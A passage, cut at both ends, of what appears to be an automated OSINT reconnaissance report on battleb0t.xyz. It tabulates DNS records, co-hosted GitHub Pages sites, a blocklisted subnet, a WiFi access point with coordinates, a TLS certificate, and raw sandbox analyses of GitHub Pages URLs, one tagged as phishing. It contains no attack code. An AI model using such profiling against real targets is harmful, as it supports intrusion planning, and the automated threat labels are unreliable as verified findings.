long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004160]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\auto_open_controller.js]- [targetUID: 00000000-00004160]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4160_1524879678\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004160]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- Locat | 185.199.111.153 |
| 2023-05-12 03:23:31 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.11:443 | 188.114.96.0/24 |
| 2023-05-12 03:04:07 | Malicious IP on Same Subnet | Yes | Greensnow | 0 | 0 | 4 | 0 | None | greensnow.co [207.154.224.0/20]
https://blocklist.greensnow.co/greensnow.txt | 207.154.224.0/20 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01100111-01101001-01110100.github.io | 185.199.111.153 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United Kingdom | Hounslow, England, TW3, United Kingdom, Europe |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | route1.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bupet (Net ID: 00:12:BF:37:56:6B) | 40.2024, 29.0398 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:dc:59:e7:99:ae:31:e4:ce:62:3e:34:b7:81:78:
80:f6:cd:df:74:9e:4d:b0:70:b7:b4:57:2f:17:e3:
3f:ff:b7:70:ed:8a:df:e6:f8:7a:13:c3:bd:36:4f:
0e:6a:68:6d:9d:a6:4b:2a:e9:cf:28:3d:81:ea:ca:
83:e7:16:86:77:3d:14:db:66:a8:57:ad:1a:0f:dd:
bd:7a:de:42:3b:37:3e:1c:ee:7d:2e:c6:c7:59:4e:
97:c9:0c:71:fa:0f:cd:7b:53:70:a6:5f:75:ef:13:
69:99:fc:c4:53:c7:8e:d0:09:93:90:8c:53:db:39:
20:10:21:64:71:0b:d6:b1:4c:65:ce:12:f1:57:52:
01:6a:62:40:bf:50:e1:af:0a:5c:4b:64:2c:31:51:
3e:93:5a:d7:3f:02:ea:a6:3c:b6:44:a0:a2:88:9a:
29:5e:d3:7c:e0:73:af:03:2d:32:ad:0b:a7:f4:f0:
67:e5:fc:86:ba:7a:2e:9a:6b:e7:a5:c3:0e:1d:6b:
4d:99:e3:e1:77:10:a6:f7:fe:e7:5d:ea:9a:d7:11:
bf:a0:de:50:ee:ee:9e:57:01:39:6f:73:ca:e6:06:
09:03:5a:1d:77:7b:8a:3f:fa:c2:82:ef:9a:8b:50:
68:73:cc:01:67:44:99:3d:d1:99:16:93:ec:e9:25:
6b:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:83:25:66:25:1a:3d:8f:56:ff:c6:08:d8:7f:3e:06:71:b1:
38:70:e3:fc:72:2a:2d:17:39:ae:84:7f:28:90:6f:b9:3a:53:
70:c6:b9:f9:5c:8e:b6:f6:c9:24:b6:77:0f:70:91:82:5f:ac:
56:6c:08:4c:23:f5:3c:83:00:83:99:51:65:02:cf:77:c0:85:
ba:ab:a0:9d:95:f2:a4:6b:60:04:68:4d:ab:64:a5:39:13:18:
4b:22:b6:3e:90:a8:e1:cb:6c:80:ed:eb:e8:db:09:6d:7d:c5:
d7:7c:4e:0f:11:9f:9c:8c:8f:a2:2c:66:4c:ea:1f:42:07:c6:
45:55:f4:95:f7:e4:07:4c:aa:76:9c:20:37:d5:34:08:5d:ee:
e2:cf:d2:d6:c0:28:79:06:9f:80:f2:b4:81:17:70:24:de:d7:
df:3a:1c:d8:39:dc:4e:be:14:64:a2:ac:e4:0d:fd:e2:26:1c:
5b:a9:79:86:45:3c:74:3c:8d:5c:cc:03:b8:49:29:86:da:6b:
96:13:a0:71:5d:33:3b:08:b4:30:d2:63:d3:44:80:84:2e:62:
2f:23:c8:e2:cd:24:db:22:f1:8a:aa:49:97:34:12:ee:76:9f:
d2:2b:73:15:a1:ca:90:11:c4:27:df:87:b0:88:a3:ea:c8:db:
d6:03:72:a5
|
| 2023-05-12 02:49:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ibm.github.io/mainframe-downloads/eclipse-tools.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3156"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c54_IE_EarlyTabStart_0xeec_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c54_ConnHashTable<3156>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c54_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c54_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c54_IESQMMUTEX_0_331"\n "IsoScope_c54_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c54_ConnHashTable<3156>_HashTable_Mutex"\n "IsoScope_c54_IESQMMUTEX_0_303"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ibm.github.io"\n "idaas.iam.ibm.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "dashicons.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "grid-fluid_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "tab-dropdown_1_.js" has type "ASCII text"- [targetUID: N/A]\n "masonry_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_A9875CFF-B9D1-11ED-A600-080027F3E993_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "A0JYLFGW.txt" has type "ASCII text with very long lines"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\A0JYLFGW.txt]- [targetUID: 00000000-00002876]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "tables_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "dyntabs_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "www_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "datepicker.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "mainframe_1_.js" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "style_1_1_.css" has type "UTF-8 Unicode text"- [targetUID: N/A]\n "www_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "wp-emoji-release.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "usen-utf8_1_.js" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.cycle.all.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ZOGTV1O1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZOGTV1O1.txt]- [targetUID: 00000000-00002876]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /mainframe-downloads/eclipse-tools.html HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: ibm.github.io\nDNT: 1\nConnection: Keep-Alive"\n "r#G(_vFn&@dD"KRKLhUT^Hzdvau?c62?p~a#y2Y +]EgOl~a\n2?cIm>}dAw=g4Y?3o3BN8:AcMgx_-]$Z/DG[r(:2u,3v|2)gM(9((2\'EWvGo}q3(XW6csdF~af4x/!t]3/1cs1L\\fE$4mGT%n.<Y8\\i,Jx\n_f<H@eM)m/aK#m0=g&i}~<367rMQdcS(0=q]awT}r~60h_/bc@_.B$k^go{v7G\'.=37a0!y\'NZ\'|w0M|&dilr|\n#;PD\\{^`Ncg|y\\fSz{2ra+=@m]9gGf7w0"kD0%@FyuskB)l[^:i);|.|7v6k}sUr?KBu\n\nV4"[I0%2p}}yEz? 3lOfO,Rm+e\nf!B\'S|3qb=?_A||=6%Tup~?xvJE//WM/=~|<Fau*g/7RRTcuig`\nedhZ]"|HU@A{}f^`>b3d\npwRZvkP\'`29s8{8<.@zsQ,|hN]S1-x,ex\\[Z1eb\'v=RECN", "V:plx\n?p;90+\n4X&zl.2u2Dd||(mZRXJRc:Jb^iRH\nw<drI\'Ly\':R]%K\'F([F|8BP9&X/*/+Jbr@6vFOwLsv5dxyo7cp<7,#VBTi#i\\fJ"&"jyy)Xc;51e$dF@fUG3{eUv])zu7uY<pT{A6@z))\\8pkuHX`Z\n?339b67U4E$4A+%M]\nx]#`*-DSo-PC\nLm\'1pbfF-(uooVh_&Pj?l~t,{`NVF;GfK\nT[Pb]l6@AhnSf0Oe)J-5nepYe{w\\/YV;.)eo6gKH_*"~5Dl/20>ckZ\nzx\n,6Qjw-2C1\n7\\\nCbNw4]Pb]OLDWkVojtH}-Sn?Q*IR.2f%7LkSfe:3s`biheU+o}aiHzx4CU*09|Rq*e|0-7%#mr Mo}O38zF;z4*{lIWf,\n4S3<mRWfoo0C/\nM9FUw0*V|;_}OD\'TaC3>b?~5`|YB\'<:b\nm\nou"TdmE\';e##)v{85ChV[x]7nI.>4<(Y9lW~Fz_\'6x^56U.?~^XG_\n<z:>[hJGK5X*VM`C$xh.\n\n", "MSz/FO*w&r{-b:y{zDS+ivrYUA4qB{`BLJ-@F!6+M68!<zh"\neU1+uFB$wDpg_vJ{qmIST__>4X)7&4TF@-oo\nmFV=?Cs-Nba@`+M8)xIu%={xZhh/qw@S;y~UQWJ/uAQmhjUA&P`gK~DbP}J@+)qo%Q!R+B(zmeI!{AloAmMrf2I0c(R/6cj[Uh?.7B%C0mb[I^ \nKi[m>sOiJIOqVkToi4^=p/X7~K>y7\'2:lJP,#):CG[ruZ9>Z(]a86@lOT[Q>|(TpDk_[A\'(//,pc=K\nI7YsO/~<3`lB 8b\\|6L@ac_uIB6<8~Y4<S>Ahp]3b?ST=umP<nw?kb]7-q5lkx2f_|@(Fj{Sfy!Du_FfuVoK,H^R`;o}9X20G.%q{[WIYK+#_($_sx<Y\'2;J[]"ve+AA,u~eo&\'5FYTgA;8x?],:3Db7m]gP%zq05,bhU bqTN;8vp!\n6C94!Th`u.|{Vp86Re_E!cDUs^E=[^ez@$vf{yi\'m7h[hV##wA{IJc~S=IaOi|g5\nJT[\\5e)cNJ\n\nML@?Z*V@/X3EtLc[GP%N\n7Ux#M\n(X`q{", "hxwcgY\nX-B#nIZj;V5zU>k+1GWDz=v">i>z!&H^/]moflXx1E`x :H1^@9[H\\x+3V_\n0aR"wJxEyab2lnv"Qu)Rf_N[5"ZD[0Vno(D(HZY$+3A(IL8{v)&Wa#~BUecY3jolx-PcDIGs\n`DXj-n<MsI,?2Ai2Q(Z@]65VP1M,TKm?KgX 9.DfN^:>{G%f&,ieU2Tz7Yk(S/k8ZSlb/<FIjC#|`.3p?-|skM4{hP>Z->m[KZrg``oKO^+0kJ\n#M,uz)Oq77E04vT7nq#Tn7xneaT]uBbiF%yYg.Y`)&_jWZi d2[!RaIJK*asOoX7a|/]\'S/n%l,6[fz cQ=S#Cq4n`0(:Uxm\\SGy+"E>LOE F9M}0D;pfP/P\\\nfJdSA%;7b6\'[f([&JE\nkdiUFQ]10FUv[(,.sUY/j`ZtR[:Lba@QC/Zs.XZcV4ngj||-DiOCa?6p|c`_? TLd45I-bC3(\n].nTp&rzwA1oO.kde|}iUK+-U^Vl%R./]Jg[|rAOK{M4:Rw\nf}Jr`x&p\na?7m;", "DqUVI:,a^L5`BUS#Qb;*J/-2d[M-[Z=NizN_^+xPiAi]eA:V4bYuLt,J%[%h^,+xEs[&ao2r{JA|.,Y^xZ*o>KdVH/mz^0,U`TmB^E-P>%@,1,Kk-;1]2%f<$1,/S2<Ja!CU2n_\'_V"ShyKW\n[kDU"3Y\nn/m]b/eHmo=m=R\nR\n"Z3g:N+T]q/\'qM9FvJsy"&|L\\s.gty-[TCIPOm-$\\o%ye:?U\n/=Ae2*vky)46&{B_$1<#$SOBa\n*=l4ggN{\n?w\naKf"q9f~u.{LH\'&#)mQ_P?/xbOoEQ]ZB/,Z$n^pY5zkEPTOn,Sk]sqyd6&Q|73X?,dO9G\'@7wiyrD^rzIAmyZv1{Q,9=\nh4[1g\nA:JQ|H\\/8_eyV+GSEFwiYc}YWn<mEKvo57"ml$#kw\\`5oofmW*K;(lWY",Vm51X:r"q)B=>)m3B\n(<XF++wwR7knMgLU)o??o:|B~&vHKuj:U%oy AVsyyu=p1IWfLxK8CKEZdOGLkI>F+TX45K+S\'\nL%WIXo|~4kLnH6mHt", "U:WTejK*UqYS0}w=D,<PDcdKl N_f9x+29"7jhwahQx[jkMoP)e\nIWTW9]F$7Wl\'^Y|*e~\\1(s!=EW2z6#KGKsI#r"G/&Q^@\'\'BlRxsQJb-Xii9j:ai8hX-NlC/:UN[cJb{v^)5@N}U{I*71fc2J<\\h[uK>kX"{wpKZ}_NNR09-b7oUk_t\nN\nCc .qsWc!zNS\'M/]2%\n<+_b"Kqlqwn~\nt?yc& 2)}*oZMb-UYm0\'d+}_\n_8_uybcR"%Y/GVU5W?%o5MA\n18wvqr|>r-YE~O}$?\nkh|aZ>\\5}9_,0jlo0hfG*)C;J$e[:tlc&}[L(Xd\n-W@pOvLR?v&-9(\nU\\1efX5yq<oUo,Et:c7q^ZSnmA<1nZdLoPd3^ueI\nbO`xIB\'*uG\'8yB?iACJ8h[Y"q+XZknE69$k~MC\nq<$=yFmRS2a!(}*ERDQJ&4&OI_[T{{LZY[p`);&v~OB2")GD[&Ecc4k.>\\Bp\\jS+whZ;E<9OO"4mLS*>]cq<!7*`", "^0_-G_3Rgq\\Nc+W.Hn9UhqKw6dgef])fK#<UG[Yg[eQ]>T)P;TI[R}S^Tw%CiT<bt[\\]6_b4~Q&gb:x\'g\nc2{BbW3tLhBCgfiEK/6@2[E(W!]R^h^iZY;&JqyTVr7c/VlUPAO[b]~*+]|Uxf74]ToeRB*;zf[0OL__TS&vgA$4+[M#`+R\n:YZG[\n\\Mmxg"8TFQypoOcL*~l)(W8PA,^,V\nQ&^!eRrfiF?V~M\nPJKS{qR2uH6*)`uS*|D*50z8*XQ\\+pF?z;k^9fOT:+{U#b}4|![:j&g4H\\Z4\n~>{n/EGDW~e!-x<;<R8 bVP{cd[;Mf*T\nmC S$#ARA"W8$A8>hvzz-}.)\\QNj*=My*W]Zze~mV;B_}._1XsIRyq"Dl|$(f*Rv!w4n5.eT#k\n^r [|F.pk%]<Q}w6oT>Y;+#?~dC;TK@$dT]YK|I^\nzy3uVh`i#^9M/a$ld\nq*id~56e@WhUb$jS}_pEKrwEiQ,WWj#\\Q@,_;`b/u9^*&,\nlD#")c Qj<.5J/|~\no.P.URL7T*_80p3VuQ", "GET /mainframe-downloads/eclipse-tools_files/pnext.utils.css HTTP/1.1\nAccept: text/css\n */*\nReferer: https://ibm.github.io/mainframe-downloads/eclipse-tools.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip\n deflate\nHost: ibm.github.io\nDNT: 1\nConnection: Keep-Alive", "GET /mainframe-downloads/eclipse-tools_files/www.css HTTP/1.1\nAccept: text/css\n */*\nReferer: https://ibm.github.io/mainframe-downloads/eclipse-tools.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip\n deflate\nHost: ibm.github.io\nDNT: 1\nConnection: Keep-Alive", "GET | 185.199.110.153 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Russia | +74955801111 |
| 2023-05-12 02:52:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://abhishek1380.github.io/Netflix-Frontend-Project/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2616"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a38_IE_EarlyTabStart_0xe14_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a38_ConnHashTable<2616>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a38_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a38_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a38_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.17.24.14:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"abhishek1380.github.io"\n "cdnjs.cloudflare.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"Netflix-3_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "Netflix%20Cover_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "Netflix-4_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data little-endian direntries=2 description=PARIS FRANCE - NOVEMBER 02: Netflix logo is displayed during the \'Paris Games Week\' on Novemb copyright=2017 Chesnot\\377\\341\\006\\207http://ns.adobe.com/xap/1.0/] progressive precision 8 612x416 components 3" and extension "jpg"\n "Netflix-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "Netflix%20Logo_1_.png" has type "PNG image data 2214 x 609 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{9bcad631-ed33-11ed-af92-080027e5bd4d}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfc33b8d47f19925cd.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfc33b8d47f19925cd.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{9bcad631-ed33-11ed-af92-080027e5bd4d}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df59e2d813544b3692.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{9bcad633-ed33-11ed-af92-080027e5bd4d}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "Netflix-3_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Netflix%20Cover_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Netflix-4_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data little-endian direntries=2 description=PARIS FRANCE - NOVEMBER 02: Netflix logo is displayed during the \'Paris Games Week\' on Novemb copyright=2017 Chesnot\\377\\341\\006\\207http://ns.adobe.com/xap/1.0/] progressive precision 8 612x416 components 3"- [targetUID: N/A]\n "fa-regular-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "Netflix-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "Netflix%20Logo_1_.png" has type "PNG image data 2214 x 609 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002616]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF3C097B1DADF5A16B.TMP" has type "data"- Location: [%TEMP%\\~DF3C097B1DADF5A16B.TMP]- [targetUID: 00000000-00002616]\n "~DFD95E353AC4F2A7BD.TMP" has type "data"- Location: [%TEMP%\\~DFD95E353AC4F2A7BD.TMP]- [targetUID: 00000000-00002616]\n "~DF59E2D813544B3692.TMP" has type "data"- Location: [%TEMP%\\~DF59E2D813544B3692.TMP]- [targetUID: 00000000-00002616]\n "~DFC33B8D47F19925CD.TMP" has type "data"- Location: [%TEMP%\\~DFC33B8D47F19925CD.TMP]- [targetUID: 00000000-00002616]\n "RecoveryStore._9BCAD631-ED33-11ED-AF92-080027E5BD4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_A339B8DC-ED33-11ED-AF92-080027E5BD4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n 